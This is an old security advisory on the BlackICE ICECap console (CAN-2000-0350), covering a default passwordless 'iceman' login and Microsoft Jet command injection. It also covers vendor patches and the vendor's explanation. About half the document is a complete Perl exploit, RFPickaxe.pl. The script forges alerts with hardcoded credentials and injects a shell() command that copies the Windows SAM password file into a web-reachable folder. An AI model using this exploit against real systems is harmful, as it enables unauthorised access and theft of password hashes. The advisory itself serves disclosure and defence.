COMMAND

	ICECap

SYSTEMS AFFECTED

    BlackICE ICECap stations

PROBLEM

    Rain Forest  Puppy (RFP)  found following.   BlackICE IDS  uses  a
    management console  called ICECap  to collect  and monitor  alerts
    sent by the  various installed BlackICE  agents.  The  ICECap user
    console sits on port 8081  (included HTTP server), and alerts  are
    pushed to another server listening on port 8082.

    The first  problem is  that the  software uses  a default login of
    'iceman',  with  no  password.   This  means  we  can log onto the
    console on port 8081, or push it alerts on port 8082.  What  could
    be more fun than a few  false alerts?  The second problem  is that
    the software  uses, by  default, the  Microsoft Jet  3.5 engine to
    store alerts.  If you couple that with the shell VBA problem  that
    means you can push alerts that contain commands to be executed  on
    the ICECap system.

    BlackICE is not the  only (security) application that  stores data
    in a Microsoft .mdb file.  So what does use .mdb's?  Well, NT  4.0
    WINS, DHCP, CyberCop, etc.

    #!/usr/bin/perl
    #
    # RFPickaxe.pl - demo exploit for default ICECap login/alerts
    # Disclaimer: I do not provide technical support for my exploits!
    #
    # Sorry, this requires Unix, due to the `date` call
    
    $|=1;
    use Socket;
    
    ###############################################################
    
    # IP of ICECap system (assumes port 8082)
    
    $Target="10.10.200.4";
    
    # account info - uses default 'iceman' w/ no password
    
    $account="iceman";
    $httpauth="aWNlbWFuOiUzQjclQzYlRkU=";
    
    #-------- attributes of the alert ----------
    
    $id="100005";
    $issue_name="Exploit";
    $sev="1";
    
    # spoof these
    
    $target="0.0.0.8";
    $target_dns="some.host.com";
    $det_ip="0.0.0.8";
    $det_nbn="SENSOR";
    $int_ip="255.255.255.255";
    $param="Pickaxe";
    
    # either fake the MAC, or use it to run commands via JET vulnerability
    
    #$det_mac="0000000000000";
    $det_mac="|shell(\"cmd /c copy c:\\winnt\\repair\\sam._ ".
	    "c:\\progra~1\\networ~1\\icecap\\spatch\\en\\sam.exe \")|";
    
    ##############################################################
    
    
    $inet=inet_aton($Target);
    
    $time=`date -u "+%Y-%m-%d %T"`;
    $time=~s/ /%20/g;
    $time=~s/:/%3a/g;
    
    #path is \program files\network ice\icecap\spatch\en
    
    $alert="accountName=$account&issueID=$id&issueName=$issue_name".
	    "&severity=$sev&targetNetAddress=$target&targetDNSName=".
	    "$target_dns&detectorNetAddress=$det_ip&detectorNetBIOS".
	    "Name=$det_nbn&detectorMacAddress=$det_mac&".
	    "intruderNetAddress=$int_ip&detectorType=3&startTime=".
	    "$time¶meter=$param\r\n";
    
    $len=length($alert);
    
    @DXX=();
    $send=<<EOT
    POST / HTTP/1.0
    User-Agent: netice-alerter/1.0
    Host: $Target:8082
    Authorization: Basic $httpauth
    Content-Type: application/x-www-form-urlencoded
    Content-Length: $len
    
    EOT
    ;
    
    $send=~s/\n/\r\n/g;
    $send=$send.$alert;
    
    sendraw("$send");
    
    print @DXX;
    
    exit;
    
    sub sendraw { 	# raw network functions stay in here
	    my ($pstr)=@_;
	    $PROTO=getprotobyname('tcp')||0;
    
	    # AF_INET=2 SOCK_STREAM=1
	    eval {
	    alarm(30);
	    if(!(socket(S,2,1,$PROTO))){ die("socket");}
	    if(connect(S,pack "SnA4x8",2,8082,$inet)){
		    # multi-column perl coding...don't do as I do ;)
		    select(S); 	$|=1;
		    print $pstr;
		    @DXX=<S>;
		    select(STDOUT); close(S);
		    alarm(0); 	return;
	    } else { die("not responding"); }
	    alarm(0);};
 	    if ($@) { if ($@ =~ /timeout/){ die("Timed out!\n");}}}

SOLUTION

    NetworkICE  has  released  ICEcap   v2.0.23a,  as  well  as   some
    supporting KB articles detailing the problem.  ICEcap 2.0.23a:

        http://advice.networkice.com/advice/Support/KB/q000167/

    Jet bug

        http://advice.networkice.com/advice/Support/KB/q000164/

    Easy injection bug

        http://advice.networkice.com/advice/Support/KB/q000166/

    The  Common  Vulnerabilities  and  Exposures  (CVE)  project   has
    assigned  the  name  CAN-2000-0350  to  this  issue.   This  is  a
    candidate for  inclusion in  the CVE  list (http://cve.mitre.org),
    which standardizes names for security problems.

    There is no issue with BlackICE (Sentry/Defender/Agent) IDS.  Only
    the  centralized  console  ICEcap.    This  isn't  a  problem   in
    "officially"  supported  installations  of  ICEcap,  only   "eval"
    installations.  This  is a problem  in virtually any  product that
    uses Access/Jet/.mdb (including many built into WinNT Server).

    ICEcap  allows  the  user  to  choose  "Access" as an installation
    option  for  evaluation  purposes  only,  but  it isn't officially
    supported.  The problem is  that for many customers, setting  up a
    full SQL database requires significant investment.  They are  only
    willing to make that  investment once they've decided  to purchase
    the product.  Therefore, some customers refuse to evaluate  ICEcap
    unless Access is an  eval option.  This  leaves us in a  catch-22:
    using Access/Jet will cause the product to demo badly, but we have
    it  in  the  product  for  demo  purposes  only.  (ICEcap supports
    thousands of  sensors, which  will kill  anything but  a full  SQL
    database; hence the source of the issue).

    In any event, if you are using ICEcap w/ Access, you should either
    upgrade ICEcap, upgrade the Jet engine, or upgrade to SQL.